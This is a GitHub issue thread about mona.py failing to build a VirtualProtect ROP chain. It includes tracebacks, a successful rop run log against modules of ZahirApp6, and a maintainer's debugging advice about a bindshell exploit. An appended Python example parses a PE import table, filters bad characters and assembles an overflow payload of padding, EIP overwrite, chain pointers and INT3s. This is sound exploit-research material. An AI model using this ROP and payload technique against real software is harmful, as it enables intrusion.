mona: Mona failed to produce ropchain, got exception errors regarding IAT

When opening a new issue, please fill out the following sections:

Expected behavior

mona.py completes the ropchain/rop chain creation function.

Actual behavior

Mona throws errors when trying to produce a VirtualProtect ropchain. The issue is the same case as someone here https://github.com/corelan/mona/issues/44, but I got more errors.

Steps to reproduce the problem

Other useful information (mona version, debugger & debugger version, OS version, etc)

Last logs related to errors

************* Symbol Loading Error Summary **************
Module name            Error
Tee710                 The system cannot find the file specified

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2951, in getIAT
    thisfuncfullname = thisfunc.getName().lower()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1819, in getName
    syms = thismod.getSymbols()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1556, in getSymbols
    ntHeader = getNtHeaders(self.modbase)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 109, in getNtHeaders
    return pykd.module("ntdll").typedVar(ntheaders, modulebase + pykd.ptrDWord(modulebase + 0x3c))
TypeException: _IMAGE_NT_HEADERS : symbol name is not found

** Error trying to process module TeeUI710.bpl
** Error trying to process module TeeUI710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvDlgs100.bpl
** Error trying to process module JvDlgs100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module vclactnband100.bpl
** Error trying to process module vclactnband100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvStdCtrls100.bpl
** Error trying to process module JvStdCtrls100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module rtl100.bpl
** Error trying to process module rtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module VclSmp100.bpl
** Error trying to process module VclSmp100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module TeeDB710.bpl
** Error trying to process module TeeDB710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module xmlrtl100.bpl
** Error trying to process module xmlrtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JclVcl100.bpl
** Error trying to process module JclVcl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module Windows.StateRepositoryPS.dll
********************************************************************************
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 19097, in main
    commands[command].parseProc(opts)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 12050, in procROP
    findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 6558, in findROPGADGETS
    vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 8812, in createRopChains
    thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 9572, in getPickupGadget
    allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 7601, in findPattern
    outside = getRangesOutsideModules()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5344, in getRangesOutsideModules
    populateModuleInfo()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5818, in populateModuleInfo
    thismod = MnModule(key)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2720, in __init__
    mzbase    = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

********************************************************************************

Thank you for your help Peter.

About this issue

  • State: closed
  • Created 4 years ago
  • Comments: 30 (14 by maintainers)

Most upvoted comments

It works, and it's very fast too!! Thanks a lot, Peter!

0:000> .load pykd.pyd;!py mona up
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py up
[+] Version compare :
    Current Version : '2.0', Current Revision : 611
    Latest Version : '2.0', Latest Revision : 612
[+] New version available
    Updating to '2.0' r612
    Done
[+] Current version : '2.0' r612
[+] Locating windbglib path
[+] Checking if C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py needs an update...
[+] Version compare :
    Current Version : '1.0', Current Revision : 145
    Latest Version : '1.0', Latest Revision : 145
[+] You are running the latest version

[+] This mona.py action took 0:00:47.881000
0:000> !py mona rop -cpb '\x00\x0a\x0d\x22\x2c' -m Jcl100.bpl -s virtualprotect
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py rop -cpb '\x00\x0a\x0d\x22\x2c' -m Jcl100.bpl -s virtualprotect

---------- Mona command started on 2020-07-13 03:44:46 (v2.0, rev 612) ----------
[+] Processing arguments and criteria
    - Pointer access level : X
    - Only querying modules Jcl100.bpl
    - Bad char filter will be applied to pointers : '\x00\x0a\x0d\x22\x2c' 
[+] Generating module info table, hang on...
    - Processing modules
    - Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_ZahirApp6.exe_5976.log'
    - (Re)setting logfile C:\monalogs\ZahirApp6\_rop_progress_ZahirApp6.exe_5976.log
[+] Progress will be written to _rop_progress_ZahirApp6.exe_5976.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Only creating rop chain for 'virtualprotect'
[+] Enumerating 22 endings in 1 module(s)...
    - Querying module Jcl100.bpl
    - Search complete :
       Ending : RETN 0x0C, Nr found : 159
       Ending : RETN 0x1C, Nr found : 4
       Ending : RETN 0x0A, Nr found : 1
       Ending : RETN, Nr found : 15484
       Ending : RETN 0x20, Nr found : 2
       Ending : RETN 0x18, Nr found : 37
       Ending : RETN 0x08, Nr found : 371
       Ending : RETN 0x24, Nr found : 2
       Ending : RETN 0x02, Nr found : 2
       Ending : RETN 0x10, Nr found : 42
       Ending : RETN 0x00, Nr found : 17
       Ending : RETN 0x14, Nr found : 15
       Ending : RETN 0x04, Nr found : 404
    - Filtering and mutating 16540 gadgets
      - Progress update : 1000 / 16540 items processed (Mon 2020/07/13 03:46:12 AM) - (6%)
      - Progress update : 2000 / 16540 items processed (Mon 2020/07/13 03:46:50 AM) - (12%)
      - Progress update : 3000 / 16540 items processed (Mon 2020/07/13 03:47:11 AM) - (18%)
      - Progress update : 4000 / 16540 items processed (Mon 2020/07/13 03:47:25 AM) - (24%)
      - Progress update : 5000 / 16540 items processed (Mon 2020/07/13 03:48:16 AM) - (30%)
      - Progress update : 6000 / 16540 items processed (Mon 2020/07/13 03:48:58 AM) - (36%)
      - Progress update : 7000 / 16540 items processed (Mon 2020/07/13 03:49:15 AM) - (42%)
      - Progress update : 8000 / 16540 items processed (Mon 2020/07/13 03:49:40 AM) - (48%)
      - Progress update : 9000 / 16540 items processed (Mon 2020/07/13 03:49:59 AM) - (54%)
      - Progress update : 10000 / 16540 items processed (Mon 2020/07/13 03:50:15 AM) - (60%)
      - Progress update : 11000 / 16540 items processed (Mon 2020/07/13 03:50:35 AM) - (66%)
      - Progress update : 12000 / 16540 items processed (Mon 2020/07/13 03:50:47 AM) - (72%)
      - Progress update : 13000 / 16540 items processed (Mon 2020/07/13 03:50:58 AM) - (78%)
      - Progress update : 14000 / 16540 items processed (Mon 2020/07/13 03:51:10 AM) - (84%)
      - Progress update : 15000 / 16540 items processed (Mon 2020/07/13 03:51:26 AM) - (90%)
      - Progress update : 16000 / 16540 items processed (Mon 2020/07/13 03:51:41 AM) - (96%)
      - Progress update : 16540 / 16540 items processed (Mon 2020/07/13 03:51:46 AM) - (100%)
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
VirtualProtect
VirtualAlloc
[+] Attempting to produce rop chain for VirtualProtect
    Mon 2020/07/13 03:52:03 AM: Step 1/7: esi
** Error trying to process module kernelbase.dll
** Error trying to process module kernel32.dll
    Getting IAT for Jcl100.bpl.
    Enumerating IAT

************* Symbol Loading Error Summary **************
Module name            Error
rtl100                 The system cannot find the file specified

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
[+] Searching from 0x48000000 to 0x48324000
    Mon 2020/07/13 03:55:07 AM: Step 2/7: ebp
    Mon 2020/07/13 03:55:08 AM: Step 3/7: ebx
    Mon 2020/07/13 03:55:08 AM: Step 4/7: edx
    Mon 2020/07/13 03:55:08 AM: Step 5/7: ecx
    Mon 2020/07/13 03:55:08 AM: Step 6/7: edi
    Mon 2020/07/13 03:55:08 AM: Step 7/7: eax
[+] Preparing output file 'Jcl100.bpl_virtualprotect.xml'
    - (Re)setting logfile C:\monalogs\ZahirApp6\Jcl100.bpl_virtualprotect.xml
[+] Preparing output file 'rop_chains.txt'
    - (Re)setting logfile C:\monalogs\ZahirApp6\rop_chains.txt
[+] ROP chains written to file C:\monalogs\ZahirApp6\rop_chains.txt

[+] This mona.py action took 0:11:44.871000

quick update: can you try this:

  • Create a version of the exploit that only contains breakpoints instead of bindshell
  • run the application, attach windbg to the first ZahirApp6.exe process
  • trigger the overflow, make it hit the breakpoints
  • break windbg, check if the bpl modules are loaded now
  • run `!py mona rop -cpb '\x00\x0a\x0d\x22\x2c'`

(Still running on my system. With almost 115K+ gadgets it will take a while to complete. Might be better to restrict it to just a few modules instead of all bpl modules.)
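The two steps that this thread turns on are the "Getting IAT for Jcl100.bpl / Enumerating IAT" phase (mona walks the module's PE headers from `modulebase + 0x3c` to find the IAT slot that holds `&VirtualProtect`, which is the ESI value of its PUSHAD chain, and then applies the `-cpb` bad-char filter to that pointer) and the breakpoint-only build of the exploit suggested in the last comment. The script below is an added example, not mona's code and not code from anyone in this thread: it reimplements that IAT lookup in pure Python on a PE32 image laid out as in memory (RVA == offset, which is how a debugger sees a mapped module, so no section translation is done), applies the same bad-char filter to the resulting pointers, and assembles an INT3-only payload from them. The PE image, the load address `0x48310000` (chosen inside the `0x48000000-0x48324000` range the log searched) and all function names are constructed for the example.

```python
import struct

# Bad chars from the -cpb argument used in the log above
BAD_CHARS = b"\x00\x0a\x0d\x22\x2c"


def cstr(buf, off):
    """Read a NUL-terminated ASCII string at offset off."""
    return buf[off:buf.index(b"\0", off)].decode("ascii")


def find_iat_entries(image, image_base):
    """Map (dll, function) -> virtual address of its IAT slot for a mapped PE32 image.
    Assumes RVA == offset (in-memory layout), so no section table lookup is needed."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]      # same read as getNtHeaders()
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                                  # skip signature + IMAGE_FILE_HEADER
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images handled")
    # PE32 DataDirectory starts 96 bytes into the optional header; entry 1 = import table
    imp_rva = struct.unpack_from("<I", image, opt + 96 + 8)[0]
    entries = {}
    desc = imp_rva
    while True:
        oft, _ts, _fwd, name_rva, ft = struct.unpack_from("<IIIII", image, desc)
        if name_rva == 0 and ft == 0:
            break                                            # all-zero descriptor ends the list
        dll = cstr(image, name_rva).lower()
        names = oft or ft                                    # INT, or the IAT itself if no INT
        i = 0
        while True:
            thunk = struct.unpack_from("<I", image, names + 4 * i)[0]
            if thunk == 0:
                break
            if not thunk & 0x80000000:                       # ordinal imports carry no name
                entries[(dll, cstr(image, thunk + 2))] = image_base + ft + 4 * i
            i += 1
        desc += 20
    return entries


def has_bad_chars(value, bad=BAD_CHARS):
    """True if the little-endian encoding of a 32-bit pointer contains a bad char."""
    return any(b in bad for b in struct.pack("<I", value))


def pick_function_pointer(entries, dll, func, bad=BAD_CHARS):
    """ESI for the PUSHAD VirtualProtect chain: the IAT slot holding &func,
    accepted only if the slot address itself survives the bad-char filter."""
    va = entries.get((dll.lower(), func))
    if va is None or has_bad_chars(va, bad):
        return None
    return va


def breakpoint_payload(offset, eip_ptr, rop_ptrs, n_int3=32, bad=BAD_CHARS):
    """Debug build of the exploit: same layout, INT3s in place of the bindshell,
    so the debugger breaks with every module of the target mapped."""
    for p in (eip_ptr, *rop_ptrs):
        if has_bad_chars(p, bad):
            raise ValueError("pointer %#010x contains a bad char" % p)
    chain = b"".join(struct.pack("<I", p) for p in rop_ptrs)
    return b"A" * offset + struct.pack("<I", eip_ptr) + chain + b"\xcc" * n_int3


def build_sample_image():
    """Constructed PE32 image (not a real module): one import descriptor for
    kernel32.dll importing VirtualProtect and VirtualAlloc, RVA == offset."""
    img = bytearray(0x300)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                  # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)  # IMAGE_FILE_HEADER
    struct.pack_into("<H", img, 0x58, 0x10B)                 # optional header magic: PE32
    struct.pack_into("<II", img, 0x58 + 96 + 8, 0x200, 40)   # import directory RVA / size
    # IMAGE_IMPORT_DESCRIPTOR at 0x200: INT 0x240, name 0x280, IAT 0x260; null descriptor follows
    struct.pack_into("<IIIII", img, 0x200, 0x240, 0, 0, 0x280, 0x260)
    for base in (0x240, 0x260):                              # INT and IAT hold the same thunks on disk
        struct.pack_into("<III", img, base, 0x2A0, 0x2C0, 0)
    img[0x280:0x28D] = b"kernel32.dll\0"
    img[0x2A0:0x2B1] = b"\0\0" + b"VirtualProtect\0"         # 2-byte hint, then the name
    img[0x2C0:0x2CF] = b"\0\0" + b"VirtualAlloc\0"
    return bytes(img)


SAMPLE_BASE = 0x48310000   # hypothetical load address of the sample image
ENTRIES = find_iat_entries(build_sample_image(), SAMPLE_BASE)

if __name__ == "__main__":
    for (dll, fn), va in sorted(ENTRIES.items()):
        print("%s!%s -> IAT slot %#010x  badchars=%s" % (dll, fn, va, has_bad_chars(va)))
    esi = pick_function_pointer(ENTRIES, "kernel32.dll", "VirtualProtect")
    print(breakpoint_payload(0x10, 0x48310123, [esi], n_int3=4).hex())
```

On a real target the same lookup is done against the module bytes read out of the debugger (for example via pykd on the module base), so a failure like the one in the log, where the module object or the ntdll type information is missing, shows up as a missing or malformed header rather than as a Python traceback deep inside mona.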